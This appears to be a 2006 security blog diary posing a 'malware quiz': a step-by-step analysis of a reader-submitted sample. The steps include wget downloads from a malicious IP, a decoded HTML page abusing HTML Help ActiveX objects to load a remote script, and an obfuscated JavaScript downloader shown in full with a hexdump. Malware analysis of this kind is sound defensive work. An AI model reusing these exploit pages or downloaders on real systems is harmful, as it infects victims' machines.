Malware quiz

Published: 2006-03-13. Last Updated: 2006-03-13 18:26:32 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)

Some new malware sent in by a reader. Spaces and line breaks added
for readability and to prevent the accidental click.  The question is, what
is the malware, and what exploits were used?
Disclaimer, this is live malware, your anti-virus may trigger. I wouldn't recommend
running it anywhere except a vmware system that is isolated.

Download the first beastie:

wget http:// 85.255.117.34 / cnt9_dycht5g.htm

What is it?:

file cnt9_dycht5g.htm

cnt9_dycht5g.htm: news or mail text

Check out the contents:

head cnt9_dycht5g.htm

From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

Try to decode it:

base64 -d cnt9_dycht5g.htm > yada.out

Illegal character ':' in input file.

Strip the illegal characters and try again:

base64 -d cnt9_dycht5g.htm > yada.out

What's in there?:

file yada.out
yada.out: HTML document text

HTML, lets take a looksee:

cata yada.out

< !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
< HTML>< BODY>
< OBJECT style="display:none" id="adswqe" classid="clsid:adb880a6-d8ff-
11cf-9377-00aa003b7a11">
< PARAM name="Command" value="Related Topics, MENU">
< PARAM name="Button" value="Text:_">
< PARAM name="Window" value="$global_blank">
< PARAM name="Item1" value="
command;ms-its:c:/windows/help/ ntshared.chm:
:/alt_url_enterprise_specific.htm">
< /OBJECT>
<OBJECT style="display:none" id="adswqer" classid="clsid:adb880a6-d
8ff-11cf-9377-00aa003b7a11">
< PARAM name="Command" value="Related Topics, MENU">
< PARAM name="Button" value="Text:_">
< PARAM name="Window" value="$global_blank">
< PARAM name="Item1" value='command; javascript:execScript("document.write(\"<
script src=http:// 85.255.117.34 / cnt9.jpg
\"+String.fromCharCode(62)+\"</scr
\"+\"ipt\"+String.fromCharCode(62))")'>
< /OBJECT>
< script>adswqe.HHClick(); var vv=''; setTimeout("adswqer.HH
Click()",101); setTimeout("document.write(vv)",202); </script>
< /BODY>< /HTML>

Download the next beastie:

wget http:// 85.255.117.34 / cnt9.jpg

and voila, malware:

AntiVir 6.34.0.53       03.13.2006      no virus found
Avast   4.6.695.0       03.10.2006      no virus found
AVG     718     03.10.2006      no virus found
Avira   6.34.0.53       03.13.2006      no virus found
BitDefender     7.2     03.13.2006      no virus found
CAT-QuickHeal   8.00    03.13.2006      no virus found
ClamAV  devel-20060126  03.11.2006      Trojan.Downloader.VBS.Phel.I
DrWeb   4.33    03.13.2006      VBS.Psyme.114
eTrust-InoculateIT      23.71.100       03.12.2006      no virus found
eTrust-Vet      12.4.2115       03.10.2006      no virus found
Ewido   3.5     03.13.2006      no virus found
Fortinet        2.71.0.0        03.12.2006      VBS/Phel.I-tr
F-Prot  3.16c   03.11.2006      no virus found
Ikarus  0.2.59.0        03.10.2006      no virus found
Kaspersky       4.0.2.24        03.13.2006      no virus found
McAfee  4716    03.11.2006      VBS/Psyme
NOD32v2 1.1440  03.12.2006      no virus found
Norman  5.70.10 03.10.2006      no virus found
Panda   9.0.0.4 03.12.2006      no virus found
Sophos  4.03.0  03.13.2006      no virus found
Symantec        8.0     03.13.2006      Download.Trojan
TheHacker       5.9.5.112       03.13.2006      no virus found
UNA     1.83    03.10.2006      no virus found
VBA32   3.10.5  03.13.2006      no virus found

So what are we?

file cnt9.jpg

cnt9.jpg: data

The strings in the file are:

strings cnt9.jpg

s="C
RFLHHROO
NNAruC
AruC
\r\r
\r_\r
_B_<\r
MQ']T]237]T]++/]V_E_
_]8]T]:+]S]
EPPGJQMJJQNNHQLKP
\r]T]
]V_E_
BN_E_
_]<E]T]#]T]
]SM_A_
]XAruCP
AruruC
WVruCP
A";for(i=0;i<555;i++)s=s.substr(1)+
String.fromCharCode(127-s.charCodeAt(0));docu
ment.write(s);

How about a hexdump?

hexdump -C cnt9.jpg

00000000  73 3d 22 43 10 1d 15 1a  1c 0b 5f 16 1b 42 1e 5f 
|s="C......_..B._|
00000010  1c 13 1e 0c 0c 16 1b 42  1c 13 0c 16 1b 45 1e 1b 
|.......B.....E..|
00000020  1d 47 47 4f 1e 49 52 1b  47 19 19 52 4e 4e 1c 19 
|.GGO.IR.G..RNN..|
00000030  52 46 4c 48 48 52 4f 4f  1e 1e 4f 4f 4c 1d 48 1e 
|RFLHHROO..OOL.H.|
00000040  4e 4e 41 72 75 43 0f 1e  5c 72 1e 12 5f 11 1e 12 
|NNAruC..\r.._...|
00000050  1a 42 1c 10 12 12 1e 11  1b 5f 09 1e 13 5c 6e 1a 
|.B......._...\n.|
00000060  42 0c 17 10 5c 72 0b 1c  5c 6e 0b 41 72 75 43 0f 
|B...\r..\n.AruC.|
00000070  1e 5c 72 1e 12 5f 11 1e  12 1a 42 16 0b 1a 12 4e 
|.\r.._....B....N|
00000080  5f 09 1e 13 5c 6e 1a 42  58 53 1c 12 1b 51 1a 07 
|_...\n.BXS...Q..|
00000090  1a 53 50 1c 5f 0c 0b 1e  5c 72 0b 5f 50 12 16 11 
|.SP._...\r._P...|
000000a0  5f 1c 12 1b 51 1a 07 1a  5f 50 1c 5f 5d 1a 1c 17 
|_...Q..._P._]...|
000000b0  10 5f 10 11 5f 1a 5c 72  5c 72 10 5c 72 5f 5c 72 
|._.._.\r\r.\r_\r|
000000c0  1a 0c 5c 6e 12 1a 5f 11  1a 07 0b 5f 45 5f 0c 1a 
|..\n.._...._E_..|
000000d0  0b 5f 10 5f 42 5f 3c 5c  72 1a 1e 0b 1a 30 1d 15 
|._._B_<\r....0..|
000000e0  1a 1c 0b 57 5d 12 0c 07  12 5d 54 5d 13 4d 51 27 
|...W]....]T].MQ'|
000000f0  5d 54 5d 32 33 37 5d 54  5d 2b 2b 2f 5d 56 5f 45 
|]T]237]T]++/]V_E|
00000100  5f 10 51 10 0f 1a 11 5f  5d 38 5d 54 5d 3a 2b 5d 
|_.Q...._]8]T]:+]|
00000110  53 5d 17 0b 0b 0f 45 50  50 47 4a 51 4d 4a 4a 51 
|S]....EPPGJQMJJQ|
00000120  4e 4e 48 51 4c 4b 50 1c  11 0b 46 51 18 16 19 5d 
|NNHQLKP...FQ...]|
00000130  53 39 1e 13 0c 1a 5f 45  5f 10 51 0c 1a 11 1b 5f 
|S9...._E_.Q...._|
00000140  45 5f 0c 1a 0b 5f 0c 5f  42 5f 1c 5c 72 1a 1e 0b 
|E_..._._B_.\r...|
00000150  1a 10 1d 15 1a 1c 0b 57  5d 1e 1b 10 1b 5d 54 5d 
|.......W]....]T]|
00000160  1d 51 0c 0b 5c 72 5d 54  5d 1a 1e 12 5d 56 5f 45 
|.Q..\r]T]...]V_E|
00000170  5f 0c 51 0b 06 0f 1a 42  4e 5f 45 5f 0c 51 10 0f 
|_.Q....BN_E_.Q..|
00000180  1a 11 5f 45 5f 0c 51 08  5c 72 16 0b 1a 5f 10 51 
|.._E_.Q.\r..._.Q|
00000190  5c 72 1a 0c 0f 10 11 0c  1a 3d 10 1b 06 5f 45 5f 
|\r.......=..._E_|
000001a0  0c 51 0c 1e 09 1a 0b 10  19 16 13 1a 5f 5d 3c 45 
|.Q.........._]<E|
000001b0  5d 54 5d 23 5d 54 5d 14  51 1a 5d 54 5d 07 1a 5d 
|]T]#]T].Q.]T]..]|
000001c0  53 4d 5f 41 5f 1c 45 23  1c 51 09 1d 0c 59 59 08 
|SM_A_.E#.Q...YY.|
000001d0  0c 1c 5c 72 16 0f 0b 5f  1c 45 23 1c 51 09 1d 0c 
|..\r..._.E#.Q...|
000001e0  59 59 1b 1a 13 5f 1c 45  23 1c 51 09 1d 0c 59 59 
|YY..._.E#.Q...YY|
000001f0  16 19 5f 1a 07 16 0c 0b  5f 1c 45 23 14 51 1a 07 
|.._....._.E#.Q..|
00000200  1a 5f 0c 0b 1e 5c 72 0b  5f 1c 45 23 14 51 1a 07 
|._...\r._.E#.Q..|
00000210  1a 5d 58 41 72 75 43 50  10 1d 15 1a 1c 0b 41 72 
|.]XAruCP......Ar|
00000220  75 72 75 43 0c 1c 5c 72  16 0f 0b 41 72 75 1e 51 
|uruC..\r...Aru.Q|
00000230  3c 13 16 1c 14 57 56 72  75 43 50 0c 1c 5c 72 16 
|<....WVruCP..\r.|
00000240  0f 0b 41 22 3b 66 6f 72  28 69 3d 30 3b 69 3c 35 
|..A";for(i=0;i<5|
00000250  35 35 3b 69 2b 2b 29 73  3d 73 2e 73 75 62 73 74 
|55;i++)s=s.subst|
00000260  72 28 31 29 2b 53 74 72  69 6e 67 2e 66 72 6f 6d 
|r(1)+String.from|
00000270  43 68 61 72 43 6f 64 65  28 31 32 37 2d 73 2e 63 
|CharCode(127-s.c|
00000280  68 61 72 43 6f 64 65 41  74 28 30 29 29 3b 64 6f 
|harCodeAt(0));do|
00000290  63 75 6d 65 6e 74 2e 77  72 69 74 65 28 73 29 3b 
|cument.write(s);|
000002a0


So, what did we end up with?
Thanks to Mark for writing in with the malware du jour.

Bonus points for figuring out anything I missed, or didn't include here!

Cheers,
Adrien

The fine print: no oompah loompahs were harmed in any way in the
creation of this diary entry.


Keywords:
0 comment(s)

Comments

Login here to join the discussion.


Top of page
Diary Archives